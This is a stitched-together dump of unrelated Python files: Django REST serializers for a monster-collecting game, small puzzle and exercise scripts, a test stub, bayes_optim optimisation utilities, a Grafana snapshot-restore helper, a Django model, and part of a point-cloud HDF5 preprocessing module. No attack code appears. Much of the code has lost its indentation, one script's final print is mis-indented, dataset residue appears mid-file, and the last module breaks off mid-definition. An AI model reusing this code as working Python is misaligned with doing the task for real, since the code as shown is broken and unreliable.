skill = MonsterSkillSerializer(read_only=True)
craft_materials = HomunculusSkillCraftCostSerializer(source='homunculusskillcraftcost_set', many=True)
class Meta:
model = HomunculusSkill
fields = ['skill', 'craft_materials', 'prerequisites']
# Small serializer for necessary info for awakens_from/to on main MonsterSerializer
class AwakensMonsterSerializer(serializers.HyperlinkedModelSerializer):
element = serializers.SerializerMethodField()
class Meta:
model = Monster
fields = ('url', 'pk', 'name', 'element')
def get_element(self, instance):
return instance.get_element_display()
class MonsterSerializer(serializers.HyperlinkedModelSerializer):
element = serializers.SerializerMethodField()
archetype = serializers.SerializerMethodField()
leader_skill = MonsterLeaderSkillSerializer(read_only=True)
awakens_from = AwakensMonsterSerializer(read_only=True)
awakens_to = AwakensMonsterSerializer(read_only=True)
source = MonsterSourceSerializer(many=True, read_only=True)
skills = MonsterSkillSerializer(many=True, read_only=True)
homunculus_skills = HomunculusSkillSerializer(many=True, source='homunculusskill_set')
class Meta:
model = Monster
fields = (
'url', 'pk', 'com2us_id', 'name', 'image_filename', 'element', 'archetype', 'base_stars', 'natural_stars',
'obtainable', 'can_awaken', 'is_awakened', 'awaken_bonus',
'skills', 'leader_skill', 'homunculus_skills',
'base_hp', 'base_attack', 'base_defense', 'speed', 'crit_rate', 'crit_damage', 'resistance', 'accuracy',
'max_lvl_hp', 'max_lvl_attack', 'max_lvl_defense',
'awakens_from', 'awakens_to',
'awaken_mats_fire_low', 'awaken_mats_fire_mid', 'awaken_mats_fire_high',
'awaken_mats_water_low', 'awaken_mats_water_mid', 'awaken_mats_water_high',
'awaken_mats_wind_low', 'awaken_mats_wind_mid', 'awaken_mats_wind_high',
'awaken_mats_light_low', 'awaken_mats_light_mid', 'awaken_mats_light_high',
'awaken_mats_dark_low', 'awaken_mats_dark_mid', 'awaken_mats_dark_high',
'awaken_mats_magic_low', 'awaken_mats_magic_mid', 'awaken_mats_magic_high',
'source', 'fusion_food', 'homunculus'
)
def get_element(self, instance):
return instance.get_element_display()
def get_archetype(self, instance):
return instance.get_archetype_display()
# Limited set of fields for a list-view style display.
class MonsterSummarySerializer(serializers.HyperlinkedModelSerializer):
element = serializers.SerializerMethodField()
archetype = serializers.SerializerMethodField()
class Meta:
model = Monster
fields = ('url', 'pk', 'com2us_id', 'name', 'image_filename', 'element', 'archetype', 'base_stars', 'natural_stars', 'fusion_food',)
def get_element(self, instance):
return instance.get_element_display()
def get_archetype(self, instance):
return instance.get_archetype_display()
# Individual collection stuff
class MonsterTagSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = MonsterTag
fields = ('id', 'name')
class RuneInstanceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = RuneInstance
fields = (
'pk', 'type', 'get_type_display', 'assigned_to', 'efficiency', 'notes', 'marked_for_sale',
'stars', 'level', 'slot', 'quality', 'original_quality', 'value', 'get_quality_display', 'get_original_quality_display',
'main_stat', 'get_main_stat_rune_display', 'main_stat_value',
'innate_stat', 'get_innate_stat_rune_display', 'innate_stat_value',
'substats', 'substat_rune_display',
'substat_values', 'substats_enchanted', 'substats_grind_value',
'PERCENT_STATS',
)
class ArtifactInstanceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ArtifactInstance
fields = (
'pk', 'element', 'get_element_display', 'assigned_to', 'efficiency', 'max_efficiency',
'quality', 'get_quality_display', 'original_quality', 'get_original_quality_display',
'slot', 'get_slot_display', 'element', 'archetype',
'level', 'main_stat', 'get_main_stat_display', 'main_stat_value',
'get_effects_display', 'get_precise_slot_display'
)
class TeamGroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = TeamGroup
fields = [
'pk', 'name',
]
class TeamSerializer(serializers.HyperlinkedModelSerializer):
group = TeamGroupSerializer()
class Meta:
model = Team
fields = [
'pk', 'name', 'group'
]
class MonsterInstanceSummarySerializer(serializers.HyperlinkedModelSerializer):
monster = MonsterSummarySerializer(read_only=True)
class Meta:
model = MonsterInstance
fields = [
'url', 'pk', 'monster', 'stars', 'level',
]
class MonsterInstanceSerializer(serializers.ModelSerializer):
monster = MonsterSerializer(read_only=True)
team_leader = TeamSerializer(many=True)
team_set = TeamSerializer(many=True)
runeinstance_set = RuneInstanceSerializer(many=True)
artifactinstance_set = ArtifactInstanceSerializer(many=True)
tags = MonsterTagSerializer(many=True)
class Meta:
model = MonsterInstance
fields = (
'pk', 'monster', 'stars', 'level',
'skill_1_level', 'skill_2_level', 'skill_3_level', 'skill_4_level',
'fodder', 'in_storage', 'ignore_for_fusion', 'priority', 'notes',
'base_hp', 'base_attack', 'base_defense', 'base_speed', 'base_crit_rate', 'base_crit_damage', 'base_resistance', 'base_accuracy',
'rune_hp', 'rune_attack', 'rune_defense', 'rune_speed', 'rune_crit_rate', 'rune_crit_damage', 'rune_resistance', 'rune_accuracy',
'artifact_hp', 'artifact_attack', 'artifact_defense',
'hp', 'attack', 'defense', 'speed', 'crit_rate', 'crit_damage', 'resistance', 'accuracy',
'team_leader', 'team_set', 'runeinstance_set', 'artifactinstance_set', 'tags'
)
depth = 1
class SummonerSummarySerializer(serializers.ModelSerializer):
class Meta:
model = Summoner
fields = ('summoner_name',)
class SummonerSerializer(serializers.ModelSerializer):
monsterinstance_set = MonsterInstanceSummarySerializer(many=True, read_only=True)
class Meta:
model = Summoner
fields = ('summoner_name', 'monsterinstance_set', 'server')
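
# Hedged usage sketch (added, not part of the original file): these serializers
# are normally consumed from DRF views/viewsets.  Hyperlinked serializers need
# the request in their context, e.g.:
#
#   summoner = Summoner.objects.prefetch_related("monsterinstance_set").first()
#   data = SummonerSerializer(summoner, context={"request": request}).data
#
# MonsterInstanceSerializer nests rune/artifact/team data one level deep
# (depth = 1), so prefetching the related sets avoids N+1 queries.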

# -----------------------------------------------------------------------------
# Next source file: a small stand-alone exercise script that alternates the
# case of the alphabetic characters on each input line.
# -----------------------------------------------------------------------------
amount = int(input())
sen = [0 for n in range(amount)]
for i in range(amount):
    sen[i] = list(input())
    cap = False
    for z in range(len(sen[i])):
        if sen[i][z].isalpha():
            if cap:
                cap = False
                sen[i][z] = sen[i][z].upper()
            else:
                sen[i][z] = sen[i][z].lower()
                cap = True
for x in range(amount):
print("".join(sen[x])) | StarcoderdataPython |
1798648 | <reponame>henrikstranneheim/chanjo-report
# -*- coding: utf-8 -*-
"""
test_chanjo_report
----------------------------------
Tests for `chanjo-report` module.
"""
import pytest
import chanjo_report


class TestChanjoReport(object):

    @classmethod
    def set_up(self):
        pass

    def test_something(self):
        pass

    @classmethod
    def tear_down(self):
        pass

# -----------------------------------------------------------------------------
# Next source file: bayes_optim/utils/utils.py
# -----------------------------------------------------------------------------
import functools
import os
import random
import re
import string
import time
from copy import copy
from typing import Callable, Dict, List, Union
import numpy as np
from ..solution import Solution
from .exception import ConstraintEvaluationError
def is_pareto_efficient(fitness, return_mask: bool = True) -> Union[List[int], List[bool]]:
"""get the Pareto efficient subset
Parameters
----------
fitness : np.ndarray of shape (n_points, n_obj)
the objective value
return_mask : bool, optional
if returning a mask, by default True
Returns
-------
An array of indices of pareto-efficient points.
If return_mask is True, this will be an (n_points, ) boolean array
Otherwise it will be a (n_efficient_points, ) integer array of indices.
"""
is_efficient = np.arange(fitness.shape[0])
n_points = fitness.shape[0]
next_point_index = 0 # Next index in the is_efficient array to search for
while next_point_index < len(fitness):
nondominated_point_mask = np.any(fitness < fitness[next_point_index], axis=1)
nondominated_point_mask[next_point_index] = True
is_efficient = is_efficient[nondominated_point_mask] # Remove dominated points
fitness = fitness[nondominated_point_mask]
next_point_index = np.sum(nondominated_point_mask[:next_point_index]) + 1
if return_mask:
is_efficient_mask = np.zeros(n_points, dtype=bool)
is_efficient_mask[is_efficient] = True
return is_efficient_mask
return is_efficient
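

# Hedged illustration (added, not part of the original module): a tiny,
# self-contained check of `is_pareto_efficient` on a hand-made minimisation
# problem.  The helper name below is an assumption added for demonstration only.
def _demo_is_pareto_efficient():
    # (1, 1) dominates (2, 2); (0, 3) is incomparable with (1, 1)
    fitness = np.array([[1.0, 1.0], [2.0, 2.0], [0.0, 3.0]])
    mask = is_pareto_efficient(fitness, return_mask=True)
    assert mask.tolist() == [True, False, True]
    return mask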
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def safe_divide(x1, x2):
"""Divide x1 / x2, return 0 where x2 == 0"""
return np.divide(x1, x2, out=np.zeros(np.broadcast(x1, x2).shape), where=(x2 != 0))
def random_string(k: int = 15):
return "".join(random.choices(string.ascii_letters + string.digits, k=k))
def expand_replace(s: str):
    # find every ${VAR} occurrence and expand it from the environment
    matches = re.findall(r"\$\{[^}]*\}", s)
    for m in matches:
        s = s.replace(m, os.path.expandvars(m))
    return s
# TODO: implement this as a C procedure
def proportional_selection(perf, N, minimize=True, replacement=True):
def select(perf):
perf_min = np.min(perf)
interval = np.cumsum((perf - perf_min) / (np.sum(perf) - perf_min * len(perf)))
return np.nonzero(np.random.rand() <= interval)[0][0]
perf = np.array(perf)
if minimize:
perf = -perf
perf -= np.min(perf)
if replacement:
res = [select(perf) for i in range(N)]
else:
assert N <= len(perf)
perf_ = copy(perf)
idx = list(range(0, len(perf)))
res = []
for i in range(N):
if len(perf_) == 1:
res.append(idx[0])
else:
_ = select(perf_)
res.append(idx[_])
perf_ = np.delete(perf_, _)
del idx[_]
return res
# TODO: double check this one. It causes the explosion of step-sizes in MIES
def handle_box_constraint(x, lb, ub):
"""This function transforms x to t w.r.t. the low and high
boundaries lb and ub. It implements the function T^{r}_{[a,b]} as
described in Rui Li's PhD thesis "Mixed-Integer Evolution Strategies
for Parameter Optimization and Their Applications to Medical Image
Analysis" as alorithm 6.
"""
x = np.asarray(x, dtype="float")
shape_ori = x.shape
x = np.atleast_2d(x)
lb = np.atleast_1d(lb)
ub = np.atleast_1d(ub)
transpose = False
if x.shape[0] != len(lb):
x = x.T
transpose = True
lb, ub = lb.flatten(), ub.flatten()
lb_index = np.isfinite(lb)
up_index = np.isfinite(ub)
valid = np.bitwise_and(lb_index, up_index)
LB = lb[valid][:, np.newaxis]
UB = ub[valid][:, np.newaxis]
y = (x[valid, :] - LB) / (UB - LB)
I = np.mod(np.floor(y), 2) == 0
yprime = np.zeros(y.shape)
yprime[I] = np.abs(y[I] - np.floor(y[I]))
yprime[~I] = 1.0 - np.abs(y[~I] - np.floor(y[~I]))
x[valid, :] = LB + (UB - LB) * yprime
if transpose:
x = x.T
return x.reshape(shape_ori)
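
# Worked illustration (added, not in the original): the reflection keeps points
# inside [lb, ub].  For a scalar with lb=0, ub=1:
#
#   handle_box_constraint(1.5, 0, 1)    -> 0.5   (reflected back from the upper bound)
#   handle_box_constraint(-0.25, 0, 1)  -> 0.25  (reflected back from the lower bound)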
def fillin_fixed_value(X: List[List], fixed: Dict, search_space):
if fixed is None:
return X
if len(X) == 0:
return X
mask = np.array([v in fixed.keys() for v in search_space.var_name])
values = [fixed[k] for i, k in enumerate(search_space.var_name) if mask[i]]
out = np.empty((len(X), len(mask)), dtype=object)
out[:, ~mask] = X
for i in range(len(X)):
out[i, mask] = values
return out.tolist()
def partial_argument(
func: callable,
var_name: List[str],
fixed: Dict[str, Union[str, float, int, object, bool]] = None,
reduce_output: bool = False,
):
"""fill-in the values for inactive variables
Parameters
----------
func : callable
the target function to call which is defined on the original search space
masks : np.ndarray
the mask array indicating which variables are deemed inactive
values : np.ndarray
the values fixed for the inactive variables
"""
fixed = {} if fixed is None else fixed
masks = np.array([v in fixed.keys() for v in var_name])
values = [fixed[k] for i, k in enumerate(var_name) if masks[i]]
@functools.wraps(func)
def wrapper(X: Union[np.ndarray, Solution, list]):
if not isinstance(X, np.ndarray):
X = np.array(X, dtype=object)
N = 1 if len(X.shape) == 1 else X.shape[1]
X_ = np.empty((N, len(masks)), dtype=object)
X_[:, ~masks] = X
# this is needed if `values` contains tuples
for i in range(N):
X_[i, masks] = values
out_ = func(X_)
# TODO: fix this ad-hoc solution for acquisition functions
if reduce_output:
out = []
for v in tuple(out_):
if isinstance(v, np.ndarray):
if len(v.shape) == 1 and len(v) > 1:
v = v[~masks]
elif len(v.shape) == 2:
if v.shape[0] == len(masks):
v = v[~masks, :]
elif v.shape[1] == len(masks):
v = v[:, ~masks]
elif isinstance(v, list) and len(v) == len(masks):
v = [v[m] for m in ~masks]
out.append(v)
return tuple(out)
return out_
return wrapper
def func_with_list_arg(func, arg_type, var_names):
@functools.wraps(func)
def wrapper(X):
if isinstance(X, (list, tuple)):
X = np.array(X, dtype="object")
if len(X.shape) == 1:
X = X[np.newaxis, :]
X = Solution(X, var_name=var_names)
if arg_type == "list":
X = X.tolist()
elif arg_type == "dict":
X = X.to_dict()
return np.array([func(_) for _ in X]).ravel()
return wrapper
def timeit(func):
@functools.wraps(func)
def __func__(ref, *arg, **kwargv):
t0 = time.time()
out = func(ref, *arg, **kwargv)
if hasattr(ref, "logger"):
ref.logger.info(f"{func.__name__} takes {time.time() - t0:.4f}s")
else:
print(f"{func.__name__} takes {time.time() - t0:.4f}s")
return out
return __func__
def arg_to_int(arg):
if isinstance(arg, str):
x = int(eval(arg))
elif isinstance(arg, (int, float)):
x = int(arg)
else:
raise ValueError
return x
def set_bounds(bound, dim):
if isinstance(bound, str):
bound = eval(bound)
elif isinstance(bound, (float, int)):
bound = [bound] * dim
elif hasattr(bound, "__iter__"):
bound = list(bound)
if len(bound) == 1:
bound *= dim
assert len(bound) == dim
return np.asarray(bound)
def dynamic_penalty(
X: List,
t: int = 1,
equality: Callable = None,
inequality: Callable = None,
C: float = 0.5,
alpha: float = 1,
beta: float = 1.5,
epsilon: float = 1e-1,
minimize: bool = True,
) -> np.ndarray:
r"""Dynamic Penalty calculated as follows:
$$(tC)^{\alpha} * [\sum_i max(|h(x_i)|, \epsilon) + \sum_i max(0, g(x_i))^{\beta}],$$
where $x_i$ -> each row of ``X``, h -> ``equality``, and g -> ``inequality``.
TODO: give a reference here
Parameters
----------
X : np.ndarray
Input candidate solutions
t : int, optional
The iteration number of the optimization algorithm employing this method, by default 1
equality : Callable, optional
Equality function, by default None
inequality : Callable, optional
Inequality function, by default None
C : float, optional
coefficient of the iteration term, by default 0.5
alpha : float, optional
exponent to the iteration term, by default 1
beta : float, optional
exponent applied to the inequality terms, by default 1.5
epsilon : float, optional
threshold to determine whether the equality constraint is met, by default 1e-1
minimize : bool, optional
minimize or maximize? by default True
Returns
-------
``p``
the dynamic penalty value
"""
if not hasattr(X[0], "__iter__") or isinstance(X[0], str):
X = [X]
X = np.array(X, dtype=object)
N = len(X)
p = np.zeros(N)
if equality is not None:
try:
v = np.atleast_2d(list(map(equality, X))).reshape(N, -1)
except Exception as e:
raise ConstraintEvaluationError(X, str(e)) from None
v[np.abs(v) <= epsilon] = 0
p += np.sum(np.abs(v), axis=1)
if inequality is not None:
try:
v = np.atleast_2d(list(map(inequality, X))).reshape(N, -1)
except Exception as e:
raise ConstraintEvaluationError(X, str(e)) from None
# NOTE: inequalities are always tested with less or equal relation.
# Inequalities with strict less conditions should be created by adding a tiny epsilon
# to the constraint
v[v <= 0] = 0
p += np.sum(np.abs(v) ** beta, axis=1)
p = (C * t) ** alpha * p * (-1) ** (not minimize)
return p
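
# Hedged worked example (added, not in the original): a single point x = [2.0]
# with one inequality g(x) = x[0] - 1 <= 0, violated by 1, at t=1 and the
# default C=0.5, alpha=1, beta=1.5:
#
#   dynamic_penalty([2.0], t=1, inequality=lambda x: x[0] - 1)
#   # -> (0.5 * 1) ** 1 * (1 ** 1.5) = 0.5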

# -----------------------------------------------------------------------------
# Next source file: a grafana-backup helper that restores dashboard snapshots.
# -----------------------------------------------------------------------------
import json
from grafana_backup.dashboardApi import create_snapshot


def main(args, settings, file_path):
    grafana_url = settings.get('GRAFANA_URL')
    http_post_headers = settings.get('HTTP_POST_HEADERS')
    verify_ssl = settings.get('VERIFY_SSL')
    client_cert = settings.get('CLIENT_CERT')
    debug = settings.get('DEBUG')

    with open(file_path, 'r') as f:
        data = f.read()

    snapshot = json.loads(data)
    try:
        snapshot['name'] = snapshot['dashboard']['title']
    except KeyError:
        snapshot['name'] = "Untitled Snapshot"

    (status, content) = create_snapshot(json.dumps(snapshot), grafana_url, http_post_headers,
                                        verify_ssl, client_cert, debug)

    if status == 200:
        print("create snapshot: {0}, status: {1}, msg: {2}".format(snapshot['name'], status, content))
    else:
        print("creating snapshot {0} failed with status {1}".format(snapshot['name'], status))

# -----------------------------------------------------------------------------
# Next source file: a short script that counts input lines with no repeated
# words and lines with no anagram-repeated words.
# -----------------------------------------------------------------------------
from collections import Counter
with open('./input_4.txt') as fp:
    num, add = 0, 0
    for line in fp:
        num += Counter(line.split()).most_common(1)[0][1] == 1
        add += Counter(''.join(sorted(w)) for w in line.split()).most_common(1)[0][1] == 1
print(num, add)

# -----------------------------------------------------------------------------
# Next source file: Chapter05/restful_python_2_05/Django01/games_service/games/models.py
# -----------------------------------------------------------------------------
from django.db import models


class Game(models.Model):
    created_timestamp = models.DateTimeField(auto_now_add=True)
    name = models.CharField(max_length=200)
    release_date = models.DateTimeField()
    esrb_rating = models.CharField(max_length=150)
    played_once = models.BooleanField(default=False)
    played_times = models.IntegerField(default=0)

    class Meta:
        ordering = ('name',)

# -----------------------------------------------------------------------------
# Next source file: point-cloud data-preparation module (Raw_H5f / Sorted_H5f /
# Normed_H5f pipeline).
# -----------------------------------------------------------------------------
#xyz Sep 2017
'''
Data preparation for datasets: stanford_indoor, scannet, ETH_semantic3D
Core idea: store all the information in the hdf5 file itself
# The workflow to use this tool:
Raw_H5f -> Sorted_H5f -> merge blocks to get a new block size -> randomly select n points
-> Normed_H5f -> Net_Provider
## Raw_H5f stores the raw data of the dataset, and contains several datasets: xyz, label, color... Each dataset
    stores the whole data for one data type.
    (.rh5)
## Sorted_H5f contains lots of datasets. Each dataset stores all types of data within a spatial block.
    The point number of each block/dataset can be fixed or not.
    (.sh5) Use the class Sort_RawH5f to generate a sorted file with an unfixed point number in each block, and a small stride / step size.
    Then merge .sh5 files with a small stride/step size to get a larger block size.
    (.rsh5) Randomly sample the .sh5 file to get a Sorted_H5f file with a fixed point number in each block.
## Normed_H5f includes 4 datasets: data, label, raw_xyz, pred_logit
(.sph5) This file is directly used to feed data for deep learning models.
.sph5 file is generated by Sorted_H5f.file_normalize_to_NormedH5F()
## For all three files, show_h5f_summary_info() can use to show the info summary.
## scannet_block_sample.py is the basic usage for these classes.
'''
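
# Hedged sketch (added for illustration, not in the original file): the pipeline
# described in the docstring above, written as pseudo-usage.  The exact call
# sequence is an assumption; only class/method names that appear in this module
# are used:
#
#   raw = Raw_H5f(h5py.File("scene.rh5", "w"), "scene.rh5", datasource_name="SCANNET")
#   raw.append_to_dset("xyz", xyz)
#   raw.append_to_dset("color", rgb)
#   raw.rh5_create_done()                    # -> .rh5 with geometric scope attrs
#   # Sort_RawH5f: .rh5 -> .sh5 (small stride/step, unfixed point number per block)
#   # merge .sh5 blocks to the target block size, randomly sample to a fixed
#   # point number (-> .rsh5), then normalise to .sph5, which Net_Provider
#   # feeds to the network.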
from __future__ import print_function
import os
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR,'utils'))
#from plyfile import (PlyData, PlyElement, make2d, PlyParseError, PlyProperty)
import math
import numpy as np
import h5py
import glob
import time
import multiprocessing as mp
import itertools
import ply_util
#from global_para import GLOBAL_PARA
sys.path.append(BASE_DIR+'/MATTERPORT_util')
sys.path.append(BASE_DIR+'/KITTI_util')
from MATTERPORT_util import get_cat40_from_rawcat
sys.path.append(BASE_DIR+'/all_datasets_meta')
from datasets_meta import DatasetsMeta
import csv,pickle
from configs import get_gsbb_config, NETCONFIG
import magic
''' Def key words list
Search with "name:" to find the definition.
rootb_split_idxmap
bxmh5
flatten_bidxmap
sg_bidxmap
baseb_exact_flat_num
global_step
'''
''' Important functions
get_blockids_of_dif_stride_step
get_bidxmap
get_all_bidxmaps
gsbb naming: get_pyramid_flag
file_saveas_pyramid_feed
'''
''' step, stride Configuration
(1) set_whole_scene_stride_step: limit stride, step of every cascade by whole scene scope. By calling update_align_scope_by_stridetoalign_
(2) IsLimitStrideStepCascades_Inbxmap : Always limit step and stride larger than last cascade in bxmh5
'''
SHOW_ONLY_ERR = False
DEBUGTMP = False
ENABLECHECK = False
START_T = time.time()
g_h5_num_row_1M = 5*1000
ROOT_DIR = os.path.dirname(BASE_DIR)
UPER_DIR = os.path.dirname(ROOT_DIR)
DATA_DIR = os.path.join(ROOT_DIR,'data')
DATA_SOURCE_NAME_LIST = ['ETH','STANFORD_INDOOR3D','SCANNET','MATTERPORT','KITTI', 'MODELNET40']
FLOAT_BIAS = 1e-8
def isin_sorted( a,v ):
i = np.searchsorted(a,v)
if i>=a.size: return False
r = a[i] == v
return r
def get_stride_step_name(block_stride,block_step):
if not block_step[0] == block_step[1]:
import pdb; pdb.set_trace() # XXX BREAKPOINT
pass
assert block_stride[0] == block_stride[1]
#assert (block_step[0] == block_step[2] and block_stride[0] == block_stride[2]) or (block_step[2]<0 and block_stride[2]<0)
def get_str(v):
return str(v).replace('.','d')
#assert (v*100) % 1 < 1e-8, "v=%s"%(str(v))
#if v%1!=0:
# if (v*10)%1 < 1e-8: return '%dd%d'%(v,v%1*10)
# else: return '%dd%d%d'%(v,v%1*10, v*10%1*10)
#else: return str(int(v))
if block_stride[2] == -1:
return 'stride-%s-step-%s'%(get_str(block_stride[0]),get_str(block_step[0]))
else:
return 'stride_%s_step_%s'%(get_str(block_stride[0]),get_str(block_step[0]))
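
# Worked example (added): the directory names used elsewhere in this module,
# e.g. 'stride_0d5_step_1', come from this helper:
#
#   get_stride_step_name([0.5, 0.5, 1], [1, 1, 1])    -> 'stride_0d5_step_1'
#   get_stride_step_name([0.5, 0.5, -1], [1, 1, -1])  -> 'stride-0d5-step-1'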
def rm_file_name_midpart(fn,rm_part):
base_name = os.path.basename(fn)
parts = base_name.split(rm_part)
if len(parts)>1:
new_bn = parts[0] + parts[1]
else:
new_bn = parts[0]
new_fn = os.path.join(os.path.dirname(fn),new_bn)
return new_fn
def copy_h5f_attrs(h5f_attrs):
attrs = {}
for e in h5f_attrs:
attrs[e] = h5f_attrs[e]
return attrs
def get_mean_sg_sample_rate(sum_sg_bidxmap_sample_num):
global_block_num = sum_sg_bidxmap_sample_num[0,4]
subblock_num = sum_sg_bidxmap_sample_num[:,-1]
mean_sg_bidxmap_sample_num = np.copy(sum_sg_bidxmap_sample_num)
for i in range(sum_sg_bidxmap_sample_num.shape[0]):
mean_sg_bidxmap_sample_num[i,0:5] /= mean_sg_bidxmap_sample_num[i,4]
mean_sg_bidxmap_sample_num[i,5:8] /= mean_sg_bidxmap_sample_num[i,7]
return mean_sg_bidxmap_sample_num,global_block_num,subblock_num
def get_mean_flatten_sample_rate(sum_flatten_bmap_sample_num):
global_block_num = sum_flatten_bmap_sample_num[0,2]
mean_flatten_bmap_sample_num = np.copy(sum_flatten_bmap_sample_num)
for i in range(sum_flatten_bmap_sample_num.shape[0]):
mean_flatten_bmap_sample_num[i,0:3] /= mean_flatten_bmap_sample_num[i,2]
return mean_flatten_bmap_sample_num,global_block_num
def get_attrs_str(attrs):
attrs_str = ''
for a in attrs:
elenames = ''
if type(attrs[a])==str:
a_str = attrs[a]
else:
a_val = attrs[a]
if a == "sum_sg_bidxmap_sample_num":
a_val,global_block_num,subblock_num = get_mean_sg_sample_rate(a_val)
elenames = str(GlobalSubBaseBLOCK.get_sg_bidxmap_sample_num_elename()) + '\n' + 'global_block_num: %d'%(global_block_num) + '\tsubblock_num: %s'%(subblock_num) + '\n'
if a == "sum_flatten_bmap_sample_num":
a_val,global_block_num = get_mean_flatten_sample_rate(a_val)
elenames = str(GlobalSubBaseBLOCK.get_flatten_bidxmaps_sample_num_elename()) +'\n' + 'global_block_num: %d'%(global_block_num) + '\n'
a_str = np.array2string(a_val,precision=2,separator=',',suppress_small=True)
attrs_str += ( a+':\n'+elenames+a_str+'\n' )
return attrs_str
def show_h5f_summary_info(h5f):
root_attrs = [attr for attr in h5f.attrs]
summary_str = ''
summary_str += '--------------------------------------------------------------------------\n'
summary_str += 'The root_attr: %s'%(root_attrs) + '\n'
summary_str += get_attrs_str(h5f.attrs) + '\n'
summary_str += '\n--------------------------------------------------------------------------\n'
summary_str += 'The elements in h5f\n'
def show_dset(dset_name,id):
dset_str = ''
if id>10: return dset_str
dset = h5f[dset_name]
dset_str += '# dataset %d: %s shape=%s\n'%(id,dset_name,dset.shape)
if id>6: return dset_str
dset_str += get_attrs_str(dset.attrs) + '\n'
if len(dset.shape)==2:
dset_str += str( dset[0:min(10,dset.shape[0]),:]) + '\n'
if len(dset.shape)==3:
dset_str += str( dset[0:min(2,dset.shape[0]),:] ) + '\n'
elif len(dset.shape)==4:
var = dset[0:min(1,dset.shape[0]),0,0:min(2,dset.shape[2]),:]
dset_str += np.array2string(var,formatter={'float_kind':lambda var:"%0.2f"%var}) + '\n'
dset_str += '\n'
return dset_str
def show_root_ele(ele_name,id):
root_ele_str = ''
ele = h5f[ele_name]
if type(ele) == h5py._hl.group.Group:
root_ele_str += 'The group: %s'%(ele_name) + '\n'
root_ele_str += get_attrs_str(ele.attrs) + '\n'
for dset_name in ele:
root_ele_str += show_dset(ele_name+'/'+dset_name,id)
else:
root_ele_str += show_dset(ele_name,id)
return root_ele_str
k = -1
for k, ele_name in enumerate(h5f):
if ele_name == 'xyz':
summary_str += show_dset(ele_name,k)
continue
summary_str += show_root_ele(ele_name,k)
summary_str += '%d datasets totally'%(k+1)+'\n'
print( summary_str )
return summary_str
def get_sample_choice(org_N,sample_N,random_sampl_pro=None):
'''
all to be replaced with random_choice later
'''
sample_method='random'
if sample_method == 'random':
if org_N == sample_N:
sample_choice = np.arange(sample_N)
elif org_N > sample_N:
sample_choice = np.random.choice(org_N,sample_N,replace=False,p=random_sampl_pro)
else:
#sample_choice = np.arange(org_N)
new_samp = np.random.choice(org_N,sample_N-org_N)
sample_choice = np.concatenate( (np.arange(org_N),new_samp) )
reduced_num = org_N - sample_N
#str = '%d -> %d %d%%'%(org_N,sample_N,100.0*sample_N/org_N)
#print(str)
return sample_choice,reduced_num
def random_choice(org_vector,sample_N,random_sampl_pro=None, keeporder=True, only_tile_last_one=False):
assert org_vector.ndim == 1
org_N = org_vector.size
if org_N == sample_N:
sampled_vector = org_vector
elif org_N > sample_N:
sampled_vector = np.random.choice(org_vector,sample_N,replace=False,p=random_sampl_pro)
if keeporder:
sampled_vector = np.sort(sampled_vector)
else:
if only_tile_last_one:
new_vector = np.array( [ org_vector[-1] ]*(sample_N-org_N) ).astype(org_vector.dtype)
else:
new_vector = np.random.choice(org_vector,sample_N-org_N,replace=True)
sampled_vector = np.concatenate( [org_vector,new_vector] )
#str = '%d -> %d %d%%'%(org_N,sample_N,100.0*sample_N/org_N)
#print(str)
return sampled_vector
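
# Hedged illustration (added): up-sampling with only_tile_last_one=True simply
# repeats the final element, e.g.
#
#   random_choice(np.arange(3), 5, only_tile_last_one=True) -> [0, 1, 2, 2, 2]
#
# while down-sampling draws without replacement and, by default, keeps the
# sampled values in sorted order.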
def index_in_sorted(sorted_vector,values):
if values.ndim==0:
values = np.array([values])
assert values.ndim<=1 and sorted_vector.ndim==1
#values_valid = values[np.isin(values,sorted_vector)]
indexs = np.searchsorted(sorted_vector,values)
indexs_valid = []
for j,index in enumerate(indexs):
if index<sorted_vector.size and sorted_vector[index] == values[j]:
indexs_valid.append( index )
indexs_valid = np.array(indexs_valid)
assert indexs_valid.size <= values.size
#assert indexs.size==0 or np.max(indexs) < sorted_vector.size, 'err in index_in_sorted'
return indexs_valid
def check_h5fs_intact(file_name):
if not os.path.exists(file_name):
return False,"file not exist: %s"%(file_name)
f_format = os.path.splitext(file_name)[-1]
if f_format == '.rh5':
return Raw_H5f.check_rh5_intact(file_name)
elif f_format == '.sh5' or f_format == '.rsh5':
return Sorted_H5f.check_sh5_intact(file_name)
elif f_format == '.sph5' or f_format == '.prh5':
return Normed_H5f.check_sph5_intact(file_name)
elif f_format == '.bmh5':
return GlobalSubBaseBLOCK.check_bmh5_intact(file_name)
else:
return False, "file format not recognized %s"%(f_format)
def float_exact_division( A, B ):
C = A / B
r = np.isclose( C, np.rint(C) )
R = r.all()
return R
def my_fix(orgvar):
# why we do not use np.fix() directly: np.fix(2.999999) = 2.0
assert orgvar.ndim == 1
rint_var = np.rint(orgvar)
zero_gap = rint_var - orgvar
fix_var = np.copy(orgvar).astype(np.int64)
for i in range(orgvar.size):
if np.isclose(zero_gap[i],0):
fix_var[i] = rint_var[i].astype(np.int64)
else:
fix_var[i] = np.fix(orgvar[i]).astype(np.int64)
return fix_var
def my_ceil(orgvar):
# why we do not use np.ceil directly: e.g. np.ceil(12.000000000001) = 13
assert orgvar.ndim == 1
rint_var = np.rint(orgvar)
zero_gap = rint_var - orgvar
ceil_var = np.copy(orgvar).astype(np.int64)
for i in range(orgvar.size):
if np.isclose(zero_gap[i],0):
ceil_var[i] = rint_var[i].astype(np.int64)
else:
try:
ceil_var[i] = np.ceil(orgvar[i]).astype(np.int64)
except:
import pdb; pdb.set_trace() # XXX BREAKPOINT
pass
return ceil_var
class Raw_H5f():
'''
* raw data:unsorted points,all the time in one dataset
* Each data type as a hdf5 dataset: xyz, intensity, label, color
* class "Sorted_H5f" will sort data to blocks based on this class
'''
file_flag = 'RAW_H5F'
h5_num_row_1M = 50*1000
dtypes = { 'xyz':np.float32, 'nxnynz':np.float32, 'intensity':np.int32, \
